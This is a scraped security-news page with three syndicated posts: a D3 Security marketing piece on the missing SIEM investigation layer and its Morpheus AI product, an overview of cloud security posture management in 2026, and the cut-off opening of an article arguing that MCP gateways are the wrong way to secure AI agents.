rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-lateral-movement-detection-tools-are-missing-90-of-attacks-heres-why%2F&amp;linkname=Your%20Lateral%20Movement%20Detection%20Tools%20Are%20Missing%2090%25%20of%20Attacks.%20Here%E2%80%99s%20Why." title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-lateral-movement-detection-tools-are-missing-90-of-attacks-heres-why%2F&amp;linkname=Your%20Lateral%20Movement%20Detection%20Tools%20Are%20Missing%2090%25%20of%20Attacks.%20Here%E2%80%99s%20Why." title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-lateral-movement-detection-tools-are-missing-90-of-attacks-heres-why%2F&amp;linkname=Your%20Lateral%20Movement%20Detection%20Tools%20Are%20Missing%2090%25%20of%20Attacks.%20Here%E2%80%99s%20Why." title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://d3security.com/">D3 Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Shriram Sharma">Shriram Sharma</a>. Read the original post at: <a href="https://d3security.com/blog/attack-path-discovery-vs-lateral-movement/">https://d3security.com/blog/attack-path-discovery-vs-lateral-movement/</a> </p>

<p><strong>73% of security leaders are evaluating SIEM alternatives. Here’s why they’re asking the wrong question.</strong></p><p>The cybersecurity industry has a new consensus: SIEM is broken. Startups pitch AI SOC platforms as the replacement. Analysts warn of vendor lock-in. Conference keynotes declare the end of an era.</p><p>They’re all wrong about the diagnosis.</p><p>The SIEM isn’t broken. The investigation layer that should sit on top of it was never built. And that gap is what’s actually burning out SOC teams, letting attackers dwell for months, and driving the 73% of security leaders who told Sumo Logic they’re shopping for alternatives.</p><h2 class="wp-block-heading">The real numbers behind the frustration</h2><p>The frustration is justified. SANS found that analysts take an average of 56 minutes before acting on an alert and 70 minutes to fully investigate a single incident. Devo reports that 53% of all alerts are false positives. Up to 40% of alerts go completely uninvestigated. And 61% of SOC teams admit to ignoring alerts that later turned out to be genuine compromise.</p><p>Those numbers aren’t a SIEM failure. They’re an investigation capacity failure. SIEMs detect and alert. They were never designed to investigate. When a SIEM fires an alert, a human analyst must manually query across endpoints, identity systems, cloud platforms, email gateways, and network sensors to figure out what actually happened. That manual process takes an hour. Organizations face thousands of alerts daily. The math doesn’t work.</p><h2 class="wp-block-heading">SIEMs still do things nothing else can</h2><p>Before ripping anything out, it’s worth acknowledging what SIEMs do well. They remain the authoritative system of record for compliance (SOC 2, HIPAA, PCI-DSS, NIS2, DORA). They handle log aggregation and normalization at enterprise scale. Their correlation rule engines represent years of detection engineering investment. And in May 2025, CISA and NSA published joint guidance explicitly recommending SIEM and SOAR implementation as foundational security infrastructure.</p><p>The global SIEM market is projected to reach $13.55 billion by 2029 at 13.7% CAGR. SIEMs aren’t dying. They’re not going anywhere.</p><h2 class="wp-block-heading">The AI SOC market has a category problem</h2><p>Most AI SOC startups do one thing: they ingest alert feeds, score them with AI, and suppress false positives. That’s genuine noise reduction. True investigation requires cross-stack correlation.</p><p>When SIEM vendors and industry analysts critique AI SOC companies, this L1 triage bot category is typically what they’re examining. Gartner placed AI SOC agents at the Peak of Inflated Expectations in their 2025 Hype Cycle, warning that claims still outpace sustained improvement.</p><p>The critical buyer question: Does the AI investigate threats and correlate across your entire stack? Or does it help humans filter alerts faster while the same structural investigation gap remains?</p><h2 class="wp-block-heading">What investigation actually requires</h2><p>Real investigation means tracing attack paths across tool boundaries. When an attacker pivots from a compromised endpoint to a cloud identity provider to a SaaS application, the SIEM sees the individual logs. But no one is stitching them together into a coherent attack narrative in real time.</p><p>D3 Security’s <a href="https://d3security.com/morpheus/">Morpheus AI</a> was built for exactly this. On every incoming alert, Morpheus AI queries the SIEM to pull correlated logs and context, then correlates across EDR, identity providers, cloud platforms, email gateways, and network sensors to build a unified attack timeline. It performs <a href="https://d3security.com/morpheus/investigation/">Attack Path Discovery</a> along two axes simultaneously: vertical deep inspection into the alert’s origin tool and horizontal correlation across the full security stack.</p><p><object data="https://d3security.com/wp-content/uploads/2026/03/MorpheusAPD-4.svg" type="image/svg+xml" width="100%" height="auto"></object></p><p>The result: L2-analyst-depth investigation on every alert, in under two minutes, 24/7. Full investigation with a contextual response playbook generated at runtime from the evidence.</p><h2 class="wp-block-heading">The SIEM becomes more valuable, not less</h2><p>This is the part most AI SOC vendors miss. Morpheus AI treats the SIEM as a critical data source, the investigation’s foundation. It complements rather than competes with your SIEM. Every SIEM log, every correlation rule, every enrichment feed contributes to a more complete investigation.</p><p>The architecture is complementary: the SIEM detects and aggregates; Morpheus AI investigates and responds. Organizations keep their compliance system of record, their centralized log store, their correlation engine. They add the investigation intelligence that the SIEM was never designed to provide.</p><h2 class="wp-block-heading">What to ask your current vendors</h2><p>If you’re part of the 73% evaluating alternatives, these questions will separate real capability from marketing:</p><ol class="wp-block-list"> <li>Can your SIEM investigate the alerts it generates, or does it rely entirely on human analysts?</li> <li>Can any single tool in your stack correlate across endpoints, network, identity, email, and cloud simultaneously?</li> <li>Is your AI SOC platform a purpose-built cybersecurity LLM, or a general-purpose model with a security wrapper?</li> <li>Can the platform generate response playbooks contextually at runtime, or does it require static playbook authoring?</li> <li>What happens when one of your vendor’s APIs changes: silent failure, or autonomous <a href="https://d3security.com/morpheus/self-healing-integrations/">self-healing</a>?</li> <li>What is the measurable time from alert to complete investigation? Under 2 minutes, or over 60?</li> </ol><h2 class="wp-block-heading">See Morpheus AI Investigate a Real Alert</h2><p><a href="https://d3security.com/demo/">Request a live demonstration</a> of <a href="https://d3security.com/morpheus/">Morpheus AI</a> investigating a real alert from your stack in under 2 minutes.</p><figure class="wp-block-image aligncenter size-full"><a href="https://d3security.com/resources/beyond-siem-beside-siem/"><img fetchpriority="high" decoding="async" width="1920" height="1080" src="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-%E2%80%94-Beyond-SIEM-Beside-SIEM.jpg" alt="Preview of the whitepaper: Beyond SIEM, Beside SIEM: How AI Closes the SIEM Investigation Gap" class="wp-image-59219" srcset="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM.jpg 1920w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM-300x169.jpg 300w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM-1024x576.jpg 1024w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM-768x432.jpg 768w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Beyond-SIEM-Beside-SIEM-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px"></a></figure><p><strong>Read the Full Resource: </strong><a href="https://d3security.com/resources/beyond-siem-beside-siem/"><strong>Beyond SIEM, Beside SIEM: How AI Closes the SIEM Investigation Gap</strong></a></p><p>Why 73% of security leaders are evaluating SIEM alternatives, what the real gap is, and how Morpheus AI complements your SIEM investment.</p><p>The post <a href="https://d3security.com/blog/siem-isnt-broken-investigation-layer-missing/">Your SIEM Isn’t Broken. Your Investigation Layer Is Missing.</a> appeared first on <a href="https://d3security.com/">D3 Security</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/your-siem-isnt-broken-your-investigation-layer-is-missing/" data-a2a-title="Your SIEM Isn’t Broken. Your Investigation Layer Is Missing."><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-siem-isnt-broken-your-investigation-layer-is-missing%2F&amp;linkname=Your%20SIEM%20Isn%E2%80%99t%20Broken.%20Your%20Investigation%20Layer%20Is%20Missing." title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-siem-isnt-broken-your-investigation-layer-is-missing%2F&amp;linkname=Your%20SIEM%20Isn%E2%80%99t%20Broken.%20Your%20Investigation%20Layer%20Is%20Missing." title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-siem-isnt-broken-your-investigation-layer-is-missing%2F&amp;linkname=Your%20SIEM%20Isn%E2%80%99t%20Broken.%20Your%20Investigation%20Layer%20Is%20Missing." title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-siem-isnt-broken-your-investigation-layer-is-missing%2F&amp;linkname=Your%20SIEM%20Isn%E2%80%99t%20Broken.%20Your%20Investigation%20Layer%20Is%20Missing." title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-siem-isnt-broken-your-investigation-layer-is-missing%2F&amp;linkname=Your%20SIEM%20Isn%E2%80%99t%20Broken.%20Your%20Investigation%20Layer%20Is%20Missing." title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://d3security.com/">D3 Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Shriram Sharma">Shriram Sharma</a>. Read the original post at: <a href="https://d3security.com/blog/siem-isnt-broken-investigation-layer-missing/">https://d3security.com/blog/siem-isnt-broken-investigation-layer-missing/</a> </p>

<p><span data-contrast="auto">Cloud security posture management (CSPM) <a href="https://securityboulevard.com/2025/02/7-cspm-tools-to-secure-your-cloud-infrastructure/" target="_blank" rel="noopener">is now a critical protection for businesses</a> in multi-cloud security environments. As of 2026, most businesses manage a hybrid and multi-cloud strategy and architecture for their AWS, Azure, Google Cloud Platform (GCP) and private clouds, which makes it unrealistic to attempt to monitor these environments manually. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">CSPM continuously monitors for cloud misconfigurations, non-compliance issues and changes in configurations, which in turn deliver automated policies and rules for the cloud services in use. CSPM can also be viewed as a combination of cloud operations, security engineering and compliance teams all in one, which is capable of helping companies scale despite limited teams. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">In this way, CSPM offers the awareness required to manage cloud risks through the detection of accessible storage, accessible ports and unsafe IAM policies.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Market adoption also illustrates this shift, as the CSPM market is estimated to rise from </span><a href="https://www.grandviewresearch.com/industry-analysis/cloud-security-posture-management-market-report#:~:text=The%20services%20segment%20is%20projected,to%20enhance%20cloud%20security%20posture." target="_blank" rel="noopener"><span data-contrast="none">$5.25 billion in 2025 to over $10 billion by 2030</span></a><span data-contrast="auto">, according to analysts. The evolution of modern CSPM solutions has meant that, in addition to compliance, identity governance, information protection and automation of remediation have been centralized. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Furthermore, these new tools allow CSPM to integrate with DevOps pipelines through policy as code and IaC scans, as well as threat intelligence and SIEM/SOAR tools, as seen in the case of </span><a href="https://www.group-ib.com/products/cloud-security-posture-management/" target="_blank" rel="noopener"><span data-contrast="none">Group-IB’s</span></a><span data-contrast="auto"> CSPM, which monitors misconfigurations in the CI/CD pipeline to detect vulnerabilities before they reach production. CSPM is no longer just an emerging concept; it is now a mature form of cloud-native security that offers unified discovery, prioritization and remediation while reducing operational overhead.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Evolution of CSPM</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">The first CSPMs, which appeared in the 2010s, were basic auditors for single clouds, raising awareness of glaring issues such as S3 buckets in public clouds or disabled encryption features. Yet as the use of the cloud increased, CSPM also evolved rapidly. In the late 2010s, the second generation of CSPMs emerged, capable of handling multiple clouds (AWS, Azure, GCP) by utilizing an agentless approach with API probes for scalability reasons. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Now, CSPMs are context-aware, with built-in support for threat intelligence, CIEM and scanning of containers and Kubernetes clusters, while KSPM identifies </span><a href="https://www.picussecurity.com/resource/blog/the-ten-most-common-kubernetes-security-misconfigurations-how-to-address-them" target="_blank" rel="noopener"><span data-contrast="none">misconfigurations in clusters</span></a><span data-contrast="auto">, and DSPM helps with data security. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">The vice president of </span><a href="http://spin.ai/" target="_blank" rel="noopener"><span data-contrast="none">Spin.AI</span></a><span data-contrast="auto"> describes the new generation of CSPMs as follows: “Modern CSPMs are much more independent and able to fix an increasing number of mistakes on their own.” Each generation of CSPM has been characterized by addressing new cloud security issues, evolving from static approaches to AI-based, real-time management of cloud posture. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Some of the key trends within the industry include greater DevOps penetration as well as AI-based automation. By 2026, the leading CSPMs have broadly integrate into the category of cloud-native application protection platforms (CNAPPs). This is because they offer integrated assessments for vulnerabilities, workloads and postures, ensuring that the application of CSPMs is proactive within the CI/CD life cycle and addresses any potential misconfigurations.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">AI-based technology is increasingly being used to improve the detection of potential policy violators as well as anomalous behavior. Modern CSPM systems are capable of addressing situations independently and of escalating potentially critical threats to security teams, which is a very different approach from earlier CSPM scanners.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Core Functions and Use Cases</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">By 2026, CSPM has become fully integrated throughout the cloud life cycle, effectively managing risk in dynamic environments. The primary objective of CSPM is continuous compliance and governance, which entails benchmarking against CIS Benchmarks, PCI DSS, HIPAA and GDPR, among other requirements. The platforms provide automated compliance across AWS, Azure and GCP, culminating in consolidated and audit-ready dashboards. Doing this manually is challenging, which is the main reason that nearly 89% of organizations have adopted CSPM, primarily for compliance, as stated by Flexera.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">CSPM also offers features such as automated asset discovery and the tracking of VMs, containers, databases, serverless workloads and SaaS integrations across accounts and regions. CSPM provides real-time visibility and prevents unmanaged assets by monitoring and sending alerts for changes and drifts.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Once assets are mapped, CSPM moves on to risk assessment and prioritization. CSPM accomplishes this by using a combination of configuration checks and threat intelligence.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Current CSPMs have evolved into remediation and guardrail areas, including automated remediations, one-click remediations and integrations using orchestration or ticket systems, with security scores directly linked to remediation through automation rules.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Such capabilities are of utmost importance for regulated environments such as </span><a href="https://www.fedramp.gov/" target="_blank" rel="noopener"><span data-contrast="none">FedRAMP </span></a><span data-contrast="auto">and the U.S. Civilian Government. Today, CSPM is vital for organizations that manage multiple accounts, as it supports audit readiness, reduces risks and enables operational control of the environment.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Integration, Automation and AI</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">CSPM has moved very strongly left, specifically into </span><a href="https://www.splunk.com/en_us/blog/learn/ci-cd-devops-pipeline.html"><span data-contrast="none">DevOps workflows and CI/CD pipelines</span></a><span data-contrast="auto">. CSPM scans code, specifically infrastructure as code, such as Terraform and AWS CloudFormation, before deployments. Through the implementation of security as code and the provision of intrinsic guardrails, configuration errors are identified before they enter the production environment. According to Group-IB, CSPM has moved into the monitoring of misconfigurations, specifically within CI/CD pipelines.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Sophisticated CSPMs can also correlate posture findings with external threat intelligence. This helps identify which vulnerabilities have a higher probability of being exploited by an adversary, since it correlates posture findings with attack data. This outside-in perspective helps prioritize vulnerabilities according to their attack relevance.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">AI and analytics are playing an ever-increasing role in these capabilities. Machine learning algorithms operate on configuration and telemetry data to find anomalies and unknown risk patterns, whereas AI-driven virtual assistants, such as</span><a href="https://www.paloaltonetworks.com/blog/cloud-security/ai-powered-security-copilot/"><span data-contrast="none"> Prisma Cloud Copilot</span></a><span data-contrast="auto"> from Palo Alto, speed up the overall investigation process. The literature on CSPM solutions identifies AI as a key enabler for CSPM solution development and notes that it is improving accuracy.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">However, other CSPMs go beyond detection to encompass orchestration and remediation. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Advanced CSPMs now integrate with SOAR technology and ticketing systems, as well as cloud-native technology. CSPM now utilizes automation to remediate vulnerabilities, a feature that is essential in modern compliance as it assists in the enforcement of security policies in a multi-cloud infrastructure without human intervention.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">One of the distinguishing factors of CSPM in 2026 is its high level of integration and automation. CSPM solutions in 2026 are not standalone tools, as they were in 2020; they have developed into components of the broader security and DevOps ecosystem.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Mitigating Key Cloud Risks</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">CSPM directly tackles risks specifically related to the cloud:</span><span data-ccp-props="{}"> </span></p><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="1" data-aria-level="1"><span data-contrast="auto">Cloud Misconfigurations and Drift: The most prevalent cloud security risks are misconfigurations, which can cause security breaches due to misconfigured IAM policy, networking settings or storage permissions, leading to data leaks or security breaches. CSPM continuously monitors such security risks and alerts users to misconfigurations like public buckets or insecure S3 policy configurations. As security experts observe, attackers often exploit these misconfigurations in increasingly sophisticated ways.</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="2" data-aria-level="1"><span data-contrast="auto">Identity and Access Threats: Excessive or insufficient privileges are other prominent identity and access threats. According to</span><a href="https://fedtechmagazine.com/article/2024/10/solving-multicloud-security-puzzle-with-cspm-perfcon" target="_blank" rel="noopener"><span data-contrast="none"> Sai Balabhadrapatruni</span></a><span data-contrast="auto">, a staff engineer at Palo Alto, identity-based attackers often leverage weak authentication processes and credentials obtained through theft. Current-generation CSPMs incorporate </span><a href="https://securityboulevard.com/2023/08/how-ciem-offers-a-clear-path-to-cloud-security/?__hstc=82239177.d58973e620b4621f680e52287e00bfc4.1761264000266.1761264000267.1761264000268.1&amp;__hssc=82239177.1.1761264000269&amp;__hsfp=1412292518" target="_blank" rel="noopener"><span data-contrast="none">IAM analytics and CIEM solutions</span></a><span data-contrast="auto"> that detect overprivileged accounts.</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="3" data-aria-level="1"><span data-contrast="auto">Vulnerable and Unpatched Resources: Many modern CSPMs also scan the cloud environment to identify known vulnerabilities, enabling the inclusion of CVE data in the asset inventory list. In this way, outdated and unpatched containers or images do not put the environment at risk. A unified view of misconfiguration and vulnerability alerts is offered in the new breed of CNAPP products.</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="4" data-aria-level="1"><span data-contrast="auto">Data Exposure and Compliance Risks: CSPM identifies exposed data in unencrypted databases, incorrectly configured logging and disabled encryption. Rod Wallace of Amazon identifies common data exposures, such as publicly exposed storage buckets. CSPM’s continuous monitoring approach ensures data governance, validating encryption at rest and secure access controls are in place for all accounts.</span><span data-ccp-props="{}"> </span></li></ul><ul><li aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props='{"134224900":false,"335552541":1,"335559685":720,"335559991":360,"469769242":[8226],"469777803":"left","469777804":"●","469777815":"multilevel"}' data-aria-posinset="5" data-aria-level="1"><span data-contrast="auto">Cloud-Native Containers and Kubernetes: By 2026, most CSPM solutions include capabilities such as Kubernetes security posture management (KSPM), where containers and configurations such as pods, namespace policies and registry settings are monitored, along with alerts for misconfigured registries, insecure Helm charts and misconfigured pod security policies.</span><span data-ccp-props="{}"> </span></li></ul><h3 aria-level="1"><span data-contrast="auto">Leading CSPM Solutions in 2026</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">What sets apart the top CSPMs of 2026, however, is their depth, their intelligence and their unification. As noted earlier, leading CSPMs have now outgrown the provision of simple scanning and have evolved into context-rich platforms integrated into CNAPPs, such as </span><a href="https://orca.security/"><span data-contrast="none">Orca Security</span></a><span data-contrast="auto">. What sets them apart, subsequently, is that they offer a unified and integrated version of CSPM, combined with workload security, identity security and data security. Examples of such vendors are Wiz and Microsoft Defender for cloud.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Ease of use and automation are important differentiators. Top-tier CSPMs also come with comprehensive rule sets, automated compliance templates and remediation playbooks as part of their offering. This means that a number of issues can indeed be solved automatically or through the use of native cloud controls. On the other hand, generative AI assistants can assist teams with the automation of tasks and the addressing of security talent gaps.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Top platforms also specialize in context-aware risk prioritization. This means that they do not treat all issues equally; instead, they correlate misconfigurations directly to asset criticality, exposure and threat intelligence data. Group-IB, for instance, now incorporates attack surface and threat intelligence data to inform posture-related findings and prioritize remediation efforts according to their relevance to adversaries. Similarly, this type of correlation is also done to support alert prioritization features offered by other platforms like SentinelOne.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">In short, seamless coordination between multiple clouds is now a requirement. Leading CSPMs now promise a single pane of glass approach to AWS, Azure and GCP clouds, normalizing policy and compliance views to reduce noise and friction. Last but not least, state-of-the-art solutions now integrate with GRC and audit solutions to provide role-based reporting, dashboards for executives and risk-based metrics. CSPM has evolved from a standalone control to a fundamental security and governance building block in enterprise architecture in 2026.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="1"><span data-contrast="auto">Conclusion</span><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":400,"335559739":120}'> </span></h3><p><span data-contrast="auto">What was once seen as a compliance-oriented product, albeit in a very narrow sense, has grown into something entirely different: AI-powered products at the heart of cloud security. </span><span data-ccp-props="{}"> </span></p><p><span data-contrast="auto">CSPM in 2026 is no longer optional in any cloud deployment; it is the first line of defense. By its very nature of offering automation, visibility and prioritization of compliance and risk in ever-changing environments, CSPM solutions provide security teams with their best shot.</span><span data-ccp-props="{}"> </span></p><p><span data-contrast="auto">CSPM, when integrated with external threat visibility solutions, allows users to have full clarity regarding cloud risks from code to production. While the cloud space continues to see tremendous innovation, the future of CSPM remains exciting, as does its purpose: To completely eradicate risks and complexities so that the cloud can be utilized for safe innovation.</span><span data-ccp-props="{}"> </span></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/cloud-security-posture-management-in-2026/" data-a2a-title="Cloud Security Posture Management in 2026 "><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcloud-security-posture-management-in-2026%2F&amp;linkname=Cloud%20Security%20Posture%20Management%20in%202026%C2%A0" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcloud-security-posture-management-in-2026%2F&amp;linkname=Cloud%20Security%20Posture%20Management%20in%202026%C2%A0" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcloud-security-posture-management-in-2026%2F&amp;linkname=Cloud%20Security%20Posture%20Management%20in%202026%C2%A0" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcloud-security-posture-management-in-2026%2F&amp;linkname=Cloud%20Security%20Posture%20Management%20in%202026%C2%A0" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcloud-security-posture-management-in-2026%2F&amp;linkname=Cloud%20Security%20Posture%20Management%20in%202026%C2%A0" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p><span data-contrast="auto">We all love MCP.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto"><a href="https://securityboulevard.com/2026/03/introducing-the-mcp-security-gateway-the-next-generation-of-agentic-security/" target="_blank" rel="noopener">Model Context Protocol is open, simple, and powerful</a>, making it much easier to plug tools into AI agents in a consistent way. It has quickly become a core building block for many agentic architectures.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">We all understand the risks.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">When you give an agent access to powerful tools, you also give them the power to break things, leak data, or generate unexpected costs. So naturally, the industry started thinking: </span><i><span data-contrast="auto">“We need a way to control MCP usage.”</span></i><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">That is where </span><b><span data-contrast="auto">MCP Gateways</span></b><span data-contrast="auto"> come in.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">The idea is attractive: Put a gateway in front of all MCP servers, and you can monitor tool calls, approve or deny specific actions, and enforce policies at a central control point. It sounds good at first. In practice, MCP Gateways are the </span><b><span data-contrast="auto">wrong abstraction</span></b><span data-contrast="auto"> for securing modern agents.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Let’s look at why.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><h3 aria-level="2"><span data-contrast="auto">Why MCP Gateways are a Bad Idea</span><span data-ccp-props='{"134245418":false,"134245529":false,"335559738":360,"335559739":120}'> </span></h3><p><span data-contrast="auto">The instinct to put a gateway in front of MCP servers is understandable. It’s the same thinking that gave us firewalls, DMZs, and perimeter security. Put everything behind a checkpoint, monitor what flows through, and enforce policies from one central place.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">We know how that story ends. Perimeter security creates a hard shell with a soft center. Once you’re past the gate, you’re trusted. And in modern systems with APIs, microservices, and distributed agents, there are too many ways past the gate.</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">MCP Gateways repeat this mistake at the protocol level. They try to solve a runtime problem with a network control, and that mismatch creates more issues than it solves. </span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Here’s why they fall short:</span><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><b><span data-contrast="auto">1. They only cover MCP, not everything your agent can do</span></b><span data-ccp-props='{"335559738":240,"335559739":240}'> </span></p><p><span data-contrast="auto">Gateways only see what goes through MCP. Most real-world agent systems use much more than that. They execute shell commands and scripts, call native SDKs and libraries, connect directly to databases, and use framework-specific connectors for tools like Slack, GitHub, Jira, or cloud providers. A risky or buggy workflow does not care whether it uses MCP, a shell, or a built-in connector. From a 